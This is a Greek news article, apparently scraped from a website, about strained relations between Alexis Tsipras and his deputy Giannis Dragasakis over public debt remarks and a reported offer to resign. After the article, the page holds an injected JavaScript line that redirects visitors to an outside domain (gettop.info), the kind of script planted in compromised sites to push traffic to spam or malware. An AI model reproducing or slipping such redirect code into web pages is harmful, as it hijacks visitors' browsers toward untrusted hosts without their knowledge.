Δραγασάκης: Αλέξη, αν δεν είμαι χρήσιμος μπορώ να πάω σπίτι μου

0
9

Έχουν διαταραχτεί οι σχέσεις του πρωθυπουργού με τον αντιπρόεδρο της κυβέρνησης; Θέλει ο Γιάννης Δραγασάκης να αποχωρήσει; Σχεδιάζει να αποστασιοποιηθεί, βλέποντας τη φθορά, και ετοιμάζεται για την «επόμενη μέρα» μέσα στον Σύριζα;

Τα ερωτήματα αυτά έθεταν κομματικά στελέχη τις προηγούμενες εβδομάδες, διαπιστώνοντας την…αφωνία του και ακούγοντας την «ψιθυριστή» γκρίνια κάποιων από το Μέγαρο Μαξίμου. Το θέμα φούντωσε, βέβαια, όταν δημοσίως κινήθηκε σε εντελώς διαφορετική κατεύθυνση από τις εξαγγελίες του Αλέξη Τσίπρα στη Θεσσαλονίκη για ταχύτατη μείωση του δημόσιου χρέους της χώρας. «Είναι πολύ δύσκολο θέμα, μετά από το 2018 θα έχουμε εικόνα, θα πρέπει να μειωθεί αντιστοίχως και το χρέος των χωρών στις οποίες χρωστάμε», είπε, και προκάλεσε νευρικό κλονισμό στο πρωθυπουργικό επιτελείο.

Και σαν να μην έφταναν όλα αυτά, ήρθε και το πρωτοσέλιδο της Realnews να αποκαλύψει ότι είχε πολύωρη συνάντηση με τον πρωθυπουργό, στην οποία του είπε: «εάν δεν είμαι χρήσιμος, μπορεί και να πάω σπίτι μου, να βοηθάω και έξω από την κυβέρνηση».

Όπως γράφει η εφημερίδα, ο κ. Δραγασάκης φαίνεται πια πως απομακρύνεται από τον πρωθυπουργό, ο οποίος εξακολουθεί να τον έχει σε πολύ μεγάλη εκτίμηση, ωστόσο άλλα στελέχη του Μεγάρου Μαξίμου δεν συμμερίζονται την εκτίμηση αυτή και πιέζουν για κατάργηση της θέσης του αντιπροέδρου.

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here